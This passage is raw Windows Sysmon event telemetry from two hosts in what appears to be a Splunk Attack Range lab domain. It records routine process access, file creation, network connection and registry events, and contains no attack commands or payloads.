07:58:54.021{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051761Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:54.021{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F63E-60EB-987D-00000000CF01}9028C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051760Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:54.021{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F63E-60EB-987D-00000000CF01}9028C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001051759Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:54.008{466BC892-F63E-60EB-987D-00000000CF01}9028C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001051777Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:55.622{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5DA3D454C958C8602B47A5FF4AA0D991,SHA256=F44318A2A9BEF076C26D374BCD09C49239A297616B41E0EDB1697AD465D91132,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808773Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:54.491{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.155-37871-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x8000000000000000808772Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:55.675{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D2EC6CCC3D83272A78D910072E99BF8F,SHA256=49382CAA59E2FD8717775D820D36979661902ADDD548AAA064D73F5B4DCA28BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808771Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:55.675{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=11C0899C907764E2A297206E2C263614,SHA256=D6602F19A2059E8B6073B152651305B51526FD7D76A4CA66AEA3D90D74C15E30,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808770Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:55.066{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A671CDD868C744D190944A73EAEFFA4,SHA256=368F88428B6CBFABEA2F675EBEC1690DEE5D063F4AEEAD5D0F5395682F8C69B4,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051776Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:46.988{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse191.96.168.180-60313-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 354300x80000000000000001051775Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:46.773{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51119-false10.0.1.12-8000- 354300x80000000000000001051774Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:46.110{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local51118-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local389ldap 354300x80000000000000001051773Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:46.110{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local51118-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local389ldap 23542300x80000000000000001051772Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:55.006{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B1B56FF334AE7ED438F82071699BD008,SHA256=A9A93695668F7B2D1813C69B67D83EA9F2BDDB33DEFC9659DE2CADC4763221A3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051778Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:56.640{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F78C416BFCD8F654082FE5E5075B7FA9,SHA256=80E2EA3F28C2634292864E31AFF8388019498268970747C6D0A40F2382113320,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808774Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:56.066{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F19B3C6F902E97ACE0C2BC99F14A7EC,SHA256=9DE0C15ABCEDDE4A0AE76C04B46248DF33296F8B0E3090D8495763154979FE3D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051781Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:57.643{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C229E76B58606E765A3DC5C0190F7F20,SHA256=1E3FA81160DB4F12CEA7C1C5757E3230D4F6FC25FC08857B3BA0A9FC73FB214D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808777Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:56.229{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57351-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000808776Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:54.807{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57350-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 23542300x8000000000000000808775Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:57.081{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BFC243EFF2F5DF8CF225B91B168252C5,SHA256=9A37E9D0B92F51036745FDEA8CCE62E0BED440DA1C04B8EA27F1E50B9E5CD7F4,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051780Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:48.193{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57350-false10.0.1.14win-dc-890.attackrange.local49676- 23542300x80000000000000001051779Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:57.159{466BC892-02BC-60E8-2A00-00000000CF01}2928NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051783Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:58.662{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=11D027316F4EC3161B06A35B9ED7B4D7,SHA256=411F888F4C887D71579E31D3B85C22E9F02CAE848EE6BF79D90970FD81B8EE52,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808778Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:58.097{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E37715F725E921219B60B4E282DC401C,SHA256=24BF90B98B74365A0928475A6567670A418DAE3E7DF2EE544E5518CB97670583,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051782Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:58.208{466BC892-5A42-60E8-C510-00000000CF01}7816ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exeC:\Users\bob\AppData\Local\Microsoft_Corporation\powershell_ise.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\7816.xml~RFf6f702d.TMPMD5=4553D3891EC8198EC956E59A7FA89664,SHA256=7DA31B28073EC76DCCA7EDFC3709014058FE36DCB6626D30538493EE344D57A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051795Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:59.677{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FAACB3FF19AD25266ECF4F33926DB5FF,SHA256=EF791B30C874D6CB3090BB72A4BFD1570EE93E4C8AFDF34368C449C9C7A2E0BD,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808781Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:57.861{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse84.242.35.58static-host-84-242-35-58.awasr.om57560-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x8000000000000000808780Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:59.253{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D2EC6CCC3D83272A78D910072E99BF8F,SHA256=49382CAA59E2FD8717775D820D36979661902ADDD548AAA064D73F5B4DCA28BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808779Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:59.113{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=943F066A3A62508FBC5DBC191C8927D8,SHA256=F8C6553B9AF785FACC342FA1565BD630D748B30DEFA5432023818951D0C4FD83,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001051794Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:58:59.639{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x80000000000000001051793Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:58:59.639{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0f6f75ca) 13241300x80000000000000001051792Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:58:59.639{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d776eb-0x6366ccec) 13241300x80000000000000001051791Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:58:59.639{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d776f3-0xc52b34ec) 13241300x80000000000000001051790Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:58:59.639{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d776fc-0x26ef9cec) 13241300x80000000000000001051789Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:58:59.639{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x80000000000000001051788Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:58:59.639{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0f6f75ca) 13241300x80000000000000001051787Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:58:59.639{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d776eb-0x6366ccec) 13241300x80000000000000001051786Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:58:59.639{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d776f3-0xc52b34ec) 13241300x80000000000000001051785Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:58:59.639{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d776fc-0x26ef9cec) 354300x80000000000000001051784Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:50.673{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51120-false10.0.1.12-8089- 10341000x80000000000000001051801Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:00.692{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1549f7|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000001051800Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:00.692{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+154962|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000001051799Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:00.692{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f 10341000x80000000000000001051798Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:00.692{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336 23542300x80000000000000001051797Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:00.692{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms~RFf6f79d1.TMPMD5=FEEDDF0B48ACBAE2DF2C13E094BA61E1,SHA256=564E4AC53FEF38F8EC2ADC3773CA3AE2E546D9CF626CDED40CA8B8DCCA4D789B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051796Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:00.677{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C50F2F17C04C04165D5128743A18760,SHA256=ED9C966030F028D2B6B2D54D93D587EE5D77A928D16F3E0445B98D93DCFBCF05,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808782Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:00.144{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33CC3E055F94812A386F3D55E91B831F,SHA256=C3B925214CC9D479B41D43372CBF5F3E6F45C90971A2D13159C68DDDF7F2FC40,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051803Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:01.692{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C3732BD00001EDD4621A23878A4A0C2F,SHA256=1000C9ED988D746BD8E5AA7859873F25560F33C84232BAC05A30E96662A9D35F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808783Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:01.159{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B3679F7A5CEF6FEF9E1A5307C359532,SHA256=3187DC94525FEE62382F2BB179383412B3FC5D174F62BD317D7AA870A033A57B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051802Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:52.697{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51121-false10.0.1.12-8000- 23542300x80000000000000001051807Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 